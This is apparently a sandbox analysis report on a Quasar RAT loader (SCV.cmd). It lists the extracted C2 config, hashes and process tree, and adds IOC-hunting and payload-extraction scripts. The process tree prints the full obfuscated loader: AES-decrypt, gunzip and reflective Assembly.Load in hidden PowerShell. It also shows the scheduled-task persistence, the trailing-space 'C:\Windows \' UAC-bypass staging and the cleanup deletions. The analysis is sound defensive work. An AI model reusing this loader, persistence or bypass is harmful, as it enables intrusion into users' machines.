Analysis

  • max time kernel
    142s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-10-2024 09:25

General

  • Target

    SCV.cmd

  • Size

    537KB

  • MD5

    d20bf8dba792e2edc3e0eb7e5c30b32b

  • SHA1

    7094e6e59004962f3d3161aa3016ecfcf2b3a64f

  • SHA256

    1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485

  • SHA512

    c68d6aac5303c5d1b7ca42c310fa21fa62f0486a2d95bbfa7b0485969634b3fd9447a5cc79f6086954022080c91777f9acb40c3c2718b09d2dac75821c816a0f

  • SSDEEP

    12288:100ynYtHxuu7eaSvaoBTiFrrdkrw1vH5FiaPQdgEMlB:10KtR3lehBAr/1vian1B

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

walkout.ddnsgeek.com:8080

Mutex

27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes
  • encryption_key

    6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir
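The extracted configuration above, together with the persistence and staging commands in the process tree below, is enough to check a host for this run. The script that follows is an added example, not part of the sandbox report: it looks for the scheduled task the run registers ('OneNote startup_str', logon trigger, highest run level, action pointing at a .cmd under AppData), for any directory on the system drive whose name ends in a space (the 'C:\Windows \System32\' directory into which ComputerDefaults.exe and MLANG.dll were dropped; Win32 path normalisation strips trailing spaces, which is why the run's own cleanup used the \\?\ prefix and why tools that normalise paths miss it), for the Quasar startup_key as a Run value, for the Quasar mutex in the current session, and for the C2 host in the DNS cache and TCP table. The install paths it tests (install_name under subdirectory beneath %APPDATA%, %ProgramFiles% and System32) combine the config values with the base folders the Quasar builder offers and are assumptions; the IOC list is only this sample's.

```powershell
# Added example (not part of the sandbox report): hunt a Windows host for the
# persistence, staging and Quasar artefacts recorded in this run. Values in $Iocs
# come from the report; the install base folders are assumptions (see lead-in).
# Run from an elevated PowerShell so HKLM and other users' tasks are visible.
$Iocs = @{
    TaskName   = 'OneNote startup_str'
    C2Host     = 'walkout.ddnsgeek.com'
    C2Port     = 8080
    Mutex      = '27391f85-a482-471a-b2cd-1f8ab5bde32e'
    StartupKey = 'Quasar Client Startup'
    SubDir     = 'SubDir'
    Install    = 'Client.exe'
}
$findings = New-Object System.Collections.Generic.List[string]

# 1. Persistence: the exact task name, or any logon task that runs a script out of a
#    user profile at the highest run level (the shape Register-ScheduledTask built above).
foreach ($t in @(Get-ScheduledTask -ErrorAction SilentlyContinue)) {
    $exec = ($t.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
    $fromProfile = $exec -match '(?i)\\Users\\[^\\]+\\AppData\\.*\.(cmd|bat|ps1|vbs|js)\b'
    $atLogon = @($t.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }).Count -gt 0
    if ($t.TaskName -eq $Iocs.TaskName -or ($fromProfile -and $atLogon -and $t.Principal.RunLevel -eq 'Highest')) {
        $findings.Add("Task $($t.TaskPath)$($t.TaskName) [RunLevel=$($t.Principal.RunLevel)] -> $exec")
    }
}

# 2. Staging directory: a sibling of C:\Windows whose name ends in a space. cmd's raw
#    listing keeps the trailing space; normalised APIs drop it, so inspect via \\?\.
foreach ($name in @(cmd /c "dir /b /ad $env:SystemDrive\")) {
    if ($name.Length -gt 0 -and $name -ne $name.TrimEnd()) {
        $findings.Add("Trailing-space directory: '$env:SystemDrive\$name' (inspect as \\?\$env:SystemDrive\$name\)")
    }
}

# 3. Quasar install: startup_key written as a Run value (HKCU, or HKLM when installed
#    elevated) and install_name under subdirectory in the assumed base folders.
foreach ($hive in 'HKCU', 'HKLM') {
    $run = Get-ItemProperty "${hive}:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
    if ($run -and $run.PSObject.Properties[$Iocs.StartupKey]) {
        $findings.Add("Run value '$($Iocs.StartupKey)' in $hive -> $($run.($Iocs.StartupKey))")
    }
}
foreach ($base in $env:APPDATA, $env:ProgramFiles, "$env:SystemRoot\System32") {
    $p = Join-Path (Join-Path $base $Iocs.SubDir) $Iocs.Install
    if (Test-Path -LiteralPath $p) {
        $h = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
        $findings.Add("Install candidate: $p sha256=$h")
    }
}

# 4. Live signs: the client mutex (only visible from the same logon session), the C2
#    name in the DNS cache, and established connections to the C2 port.
$m = $null
try {
    if ([System.Threading.Mutex]::TryOpenExisting($Iocs.Mutex, [ref]$m)) {
        $findings.Add("Mutex '$($Iocs.Mutex)' exists in this session")
        $m.Dispose()
    }
} catch [System.UnauthorizedAccessException] {
    $findings.Add("Mutex '$($Iocs.Mutex)' exists but is not accessible")
}
Get-DnsClientCache -ErrorAction SilentlyContinue |
    Where-Object { $_.Entry -like "*$($Iocs.C2Host)*" } |
    ForEach-Object { $findings.Add("DNS cache: $($_.Entry) -> $($_.Data)") }
Get-NetTCPConnection -State Established -RemotePort $Iocs.C2Port -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("TCP $($_.LocalAddress):$($_.LocalPort) -> $($_.RemoteAddress):$($_.RemotePort) pid $($_.OwningProcess)") }

if ($findings.Count -eq 0) { 'No artefacts from this run found.' } else { $findings }
```

The task check deliberately matches on shape as well as name: the name 'OneNote startup_str' is trivially changed between builds, while "logon trigger, highest run level, script in AppData" is the part the loader needs to keep working. Absence of findings rules out this sample's artefacts only, not a rebuilt client with a different mutex, startup key or C2.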

Signatures

  • Quasar RAT

    Quasar is an open-source .NET Remote Access Tool.

  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Runs PowerShell with its display window hidden.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SCV.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:732
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('21+lHVoT1nOIUg8Jroa46Hm/UH9/i9xpWUh96ZETS7Q='); $aes_var.IV=[System.Convert]::FromBase64String('E1cBH4odW5y1kT4uMPBWSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$dxBNu=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$Hocfu=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$PWlBw=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($dxBNu, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $PWlBw.CopyTo($Hocfu); $PWlBw.Dispose(); $dxBNu.Dispose(); $Hocfu.Dispose(); $Hocfu.ToArray();}function execute_function($param_var,$param2_var){ IEX '$ixgug=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$QSlWJ=$ixgug.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$QSlWJ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$acAst = 'C:\Users\Admin\AppData\Local\Temp\SCV.cmd';$host.UI.RawUI.WindowTitle = $acAst;$XJQkp=[System.IO.File]::ReadAllText($acAst).Split([Environment]::NewLine);foreach ($ATsQv in $XJQkp) { if ($ATsQv.StartsWith('SwDUuRoqKFYQvQkNWaJm')) { $yiXjU=$ATsQv.Substring(20); break; }}$payloads_var=[string[]]$yiXjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 
'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      2⤵
        PID:3840
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        2⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4608
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3196
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3556
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 
'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3704
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3500
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1604
          • C:\Windows \System32\ComputerDefaults.exe
            "C:\Windows \System32\ComputerDefaults.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1824
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2948
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4976
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('21+lHVoT1nOIUg8Jroa46Hm/UH9/i9xpWUh96ZETS7Q='); $aes_var.IV=[System.Convert]::FromBase64String('E1cBH4odW5y1kT4uMPBWSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$dxBNu=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$Hocfu=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$PWlBw=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($dxBNu, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $PWlBw.CopyTo($Hocfu); $PWlBw.Dispose(); $dxBNu.Dispose(); $Hocfu.Dispose(); $Hocfu.ToArray();}function execute_function($param_var,$param2_var){ IEX '$ixgug=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$QSlWJ=$ixgug.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$QSlWJ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$acAst = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $acAst;$XJQkp=[System.IO.File]::ReadAllText($acAst).Split([Environment]::NewLine);foreach ($ATsQv in $XJQkp) { if ($ATsQv.StartsWith('SwDUuRoqKFYQvQkNWaJm')) { $yiXjU=$ATsQv.Substring(20); break; }}$payloads_var=[string[]]$yiXjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 
'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2324
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                  7⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4296
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3096
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2304
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', 
'/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:856
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:456
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1820
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:756
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3612
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1536
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 960
              5⤵
              • Program crash
              PID:3132
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4712
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SCV')
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4460
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2028
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1824 -ip 1824
      1⤵
        PID:716
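The command line repeated throughout the tree above is the whole first-stage loader: it reads its own .cmd file, takes the first line that begins with a 20-character marker, splits the rest on '\' into three blobs, undoes a two-character base64 substitution ('#' stands for '/', '@' for 'A'), base64-decodes, AES-256-CBC-decrypts with a hard-coded key and IV, gunzips, and passes each result to Assembly.Load followed by EntryPoint.Invoke (the third payload gets a one-element string[] as Main's arguments). The script below is an added example, not part of the sandbox report or of the malware: it performs the same transform statically and writes the plaintexts to disk instead of loading them. The marker, key and IV default to the values in the SCV.cmd loader line above; the script name and output directory are assumptions.

```powershell
# Added example (not from the sandbox report): statically recover the payloads
# embedded in a loader of the kind shown above, without executing them.
# Defaults are the marker/key/IV printed for SCV.cmd; -OutDir is an assumption.
param(
    [Parameter(Mandatory)] [string] $Path,                            # e.g. .\SCV.cmd
    [string] $Marker = 'SwDUuRoqKFYQvQkNWaJm',                        # 20-char line prefix
    [string] $KeyB64 = '21+lHVoT1nOIUg8Jroa46Hm/UH9/i9xpWUh96ZETS7Q=', # 32 bytes -> AES-256
    [string] $IvB64  = 'E1cBH4odW5y1kT4uMPBWSg==',                    # 16 bytes
    [string] $OutDir = '.\extracted'
)

function Decrypt-Payload([byte[]] $Cipher, [byte[]] $Key, [byte[]] $Iv) {
    # Mirrors decrypt_function: AES-CBC, PKCS7 padding, fixed key and IV.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $Iv
        $dec = $aes.CreateDecryptor()
        try { return ,$dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }  # leading comma keeps byte[] intact
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-Gzip([byte[]] $Data) {
    # Mirrors decompress_function: a single GZip stream.
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out); return ,$out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

$key = [Convert]::FromBase64String($KeyB64)
$iv  = [Convert]::FromBase64String($IvB64)

# The loader takes the first line starting with the marker; the blob is everything after it.
$blob = $null
foreach ($l in [System.IO.File]::ReadLines($Path)) {
    if ($l.StartsWith($Marker)) { $blob = $l.Substring($Marker.Length); break }
}
if (-not $blob) { throw "Marker '$Marker' not found in $Path" }

New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
$i = 0
foreach ($chunk in $blob.Split('\')) {
    $i++
    # Reverse the loader's alphabet substitution before base64-decoding.
    $b64   = $chunk.Replace('#', '/').Replace('@', 'A')
    $plain = Expand-Gzip (Decrypt-Payload ([Convert]::FromBase64String($b64)) $key $iv)
    $file  = Join-Path $OutDir ("payload{0}.bin" -f $i)
    [System.IO.File]::WriteAllBytes($file, $plain)
    # Triage line: the loader hands these to Assembly.Load, so expect an 'MZ' header.
    $magic  = if ($plain.Length -ge 2) { [System.Text.Encoding]::ASCII.GetString($plain, 0, 2) } else { '' }
    $sha256 = [System.BitConverter]::ToString([System.Security.Cryptography.SHA256]::Create().ComputeHash($plain)).Replace('-', '')
    '{0}: {1} bytes, magic={2}, sha256={3}' -f $file, $plain.Length, $magic, $sha256
}
```

Run it as `.\Extract-Loader.ps1 -Path .\SCV.cmd` on an analysis machine. SC.cmd in the Downloads list has the same SHA256 as the submitted SCV.cmd, so it is a copy of the first stage and yields the same three payloads; the dropped mbbkel3.cmd (1.6MB) is a separate build with its own marker, key and IV, which are printed in its loader line above and are passed as `-Marker dUMGHfMAItMYvjVTxFtd -KeyB64 dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs= -IvB64 VRFaPmL5cO3W99Q3sAgvnA==`. Because the key and IV are hard-coded in clear text, the encryption here hides the payloads from static string matching only; it does not resist a reader of the loader itself.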

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        1KB

        MD5

        928d36ad618a369ffebf44885d07cf81

        SHA1

        edf5a353a919c1873af8e6a0dfafa4c38c626975

        SHA256

        d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea

        SHA512

        4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

        Filesize

        53KB

        MD5

        3337d66209faa998d52d781d0ff2d804

